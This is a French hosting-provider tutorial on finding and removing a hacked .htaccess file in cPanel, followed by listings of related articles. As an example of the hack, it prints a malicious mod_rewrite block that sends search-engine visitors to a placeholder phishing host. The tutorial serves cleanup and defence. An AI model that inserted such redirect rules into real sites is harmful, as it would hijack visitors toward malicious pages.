Comment nettoyer un .htaccess hacké

Mis à jour le 17 septembre, 2020

Dans cet article nous allons discuter de mesures que vous pouvez prendre pour nettoyer et réparer un fichier .htaccess piraté.

Le fichier .htaccess est utilisé pour configurer principalement des règles pour contrôler la façon dont on accède à votre site.

Vous ne remarquerez peut-être pas que votre fichier .htaccess a été piraté jusqu'à ce qu'une enquête manuelle soit menée, ou jusqu'à ce que vous obteniez un avertissement de logiciels malveillants qui vous dit que votre site est redirigé vers un site malveillant.

Parfois, vous pouvez voir dans la barre d'état de votre navigateur Internet qu'un site Web étranger tente de charger du contenu sur votre site Web, ou vous remarquerez peut-être un avertissement dans votre navigateur Web.

Tous peuvent être des signes communs d'un hack du fichier .htaccess, vous pourriez remarquer également que vous avez perdu votre position dans le classement des moteurs de recherche.

C'est un cas typique où les pirates vont tenter de pirater votre fichier .htaccess de sorte que lorsque les robots des moteurs de recherche explorent votre site, ils sont redirigés vers le site Web que le pirate a mis en place au lieu du vôtre.

Vous pouvez faire un contrôle rapide depuis l'extérieur à l'aide de l'outil de Diagnostic Google pour savoir s'ils ont détecté quelque chose de malveillant sur votre site dans leur plus récente analyse.

Remplacez tout simplement VotreDomaine.com par votre vrai nom de domaine dans l'URL suivante:

http://google.com/safebrowsing/diagnostic?site=VotreDomaine.com

Vous pouvez en lire plus sur la page Outil de diagnostic Google.

Les étapes à suivre pour nettoyer le fichier .htacesss

En suivant les étapes ci-dessous vous pouvez apprendre à détecter un hack de .htaccess et à nettoyer votre fichier .htaccess si vous en détecter un.

Étape 1. Connectez-vous à cPanel

Étape 2. Sous la section Fichiers, cliquez sur Gestionnaire de Fichiers.

 

Étape 3. Sélectionnez l'option "Dossier Racine pour:" et sélectionnez votre domaine dans le menu déroulant.

 

Étape 4. Assurez-vous que "Montrer les fichiers cachés" est sélectionné

Étape 5. Cliquez sur "Allez"

Étape 6. Clique droit sur le fichier .htaccess et cliquez sur 'Éditer'

 

Étape7. Vous pourriez avoir une fenêtre de dialogue qui vous propose de choisir l'encodage, cliquez sur "Edit" simplement

Étape 8. Défilez de haut en bas pour voir si un bout de code semble suspect; de toute manière vous verrez très probablement quelque chose de ce genre:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://SiteHameconnage.tld/fichier_hack.php?t=3 [R,L]
</IfModule>

Ce que ce code de réécriture essaie de faire c'est de vérifier le référent d'une requête, si c'est un moteur de recherche populaire, il le redirige vers leur site SiteHameconnage.tld et essaie de charger un script malicieux fichier_hack.php.

Parce que ces instructions conditionnelles RewriteCond ne  s’appliqueraient pas à vous, et seulement aux moteurs de recherche, ce genre de hacks peut passer sous l’incognito pendant longtemps. Et le plus longtemps ils sont actifs, le plus ils affectent votre classement dans les moteurs de recherche.

Étape9. Pour supprimer ces instructions malicieuses de réécriture, vous pouvez simplement mettre en surbrillance tout le texte et appuyer 'Supp' sur votre clavier et par la suite cliquer sur "Enregistrer les modifications" sur le coin droit du haut du fichier.

Si vous n'êtes pas certains à 100% d'avoir affaire à un code malicieux de redirection, nous vous recommandons de sauvegarder votre fichier .htaccess avant de l'éditer. Pour ce faire il suffit de faire un clic-droit sur le fichier .htaccess à l'intérieur du Gestionnaire de Fichiers et de cliquer sur Copier et ensuite choisir le chemin de copie comme /public_html/.htaccess-BAK, et finalement cliquer sur Copie de Fichier(s).

Vous devez maintenant avoir compris comment trouver et éliminer un hack du fichier .htaccess qui pourrait causer des redirections malicieuses sur votre site. Vous serez très certainement intéressé de lire à propos des "Étapes à suivre après une attaque : cas de Wordpress".

Installation OpenVPN sur Centos

L’une des manières les plus sûres d’envoyer des données sur internet est via un VPN, aussi connu sous le nom de « Virtual Private Network ». Lorsque l’on utilise un VPN, les données sont encryptées et envoyées à travers un réseau virtuel privé qui utilise un réseau public (internet par exemple).  C … Continuer

Mis à jour le 15 septembre, 2020

2 Commentaires cPanel+

Comment installer Configserver sur un serveur cPanel

Vous venez de créer votre tout premier VPS ou serveur dédié, et vous êtes impatients de commencer à installer votre logiciel, avoir des utilisateurs cPanel et faire de la revente d’hébergement. En bref vous n’attendez qu’une chose : vous mettre au travail. Pas si vite ! Avant tout, vous devez effect … Continuer

Mis à jour le 29 décembre, 2014

2 Commentaires cPanel+

Comment sécuriser votre serveur cPanel

La sécurité du serveur est quelque chose qui ne devrait jamais être négligé. Un jour ou l'autre, il y a des chances que votre serveur soit l'objet d'attaques et que l'intégrité de vos données soit à risque, sans mentionner que vous risquez de perdre des clients potentiels et existants dans le même t … Continuer

Mis à jour le 8 octobre, 2015

0 Commentaires cPanel+

Comment utiliser le gestionnaire de fichiers cPanel

Le gestionnaire de fichiers vous permet de gérer votre site via HTTP plutôt qu’avec un outil FTP ou toute autre application tierce. Vous pouvez télécharger, créer ou supprimer des fichiers, organiser les fichiers en dossiers et de modifier les permissions des fichiers. Même s'il n'est pas aussi soph … Continuer

Mis à jour le 7 octobre, 2015

0 Commentaires cPanel+

Comment bloquer une IP dans cPanel

De nos jours, le nombre d’araignées du Web  (robots d’indexation) malveillants ne cesse d’augmenter. Ces robots ont comme objectif de collecter les emails et les failles des sites web pour organiser des attaques par la suite. À chaque fois qu’ils visitent un site web, ils puisent dans les ressources … Continuer

Mis à jour le 7 octobre, 2015

0 Commentaires cPanel+

Comment rediriger une URL dans cPanel

L'outil de redirections dans cPanel vous permet de rediriger les visiteurs de votre site à partir d'une URL source vers une URL cible. Attention: ne jamais créer une redirection pour domaine.com à www.domaine.com ou de domain.com à domain.com/index. En utlilisant l’une ou l’autre, vous risquez de p … Continuer

Mis à jour le 2 octobre, 2015

0 Commentaires cPanel+

Comment protéger un répertoire dans Cpanel

Vous pouvez protéger des répertoires (dossiers) par un mot de passe via le panneau de contrôle cPanel. Ceci vous permet de protéger tous les fichiers contenus dans les dossiers sécurisés par mot de passe. Note : cPanel ne peut protéger que des répertoires mais pas les fichiers individuels. Tout fic … Continuer

Mis à jour le 3 décembre, 2019

1 Commentaires cPanel+

Comment créer un compte FTP dans cPanel

Un compte FTP est utilisé pour transférer et gérer des fichiers sur votre site web. Vous pouvez donner différents niveaux d'accès à différents utilisateurs en les assignant à un répertoire spécifique. Vous devez créer un compte FTP pour chaque utilisateur. Note: Par défaut, vous disposez déjà d'un … Continuer

Mis à jour le 26 septembre, 2015

0 Commentaires cPanel+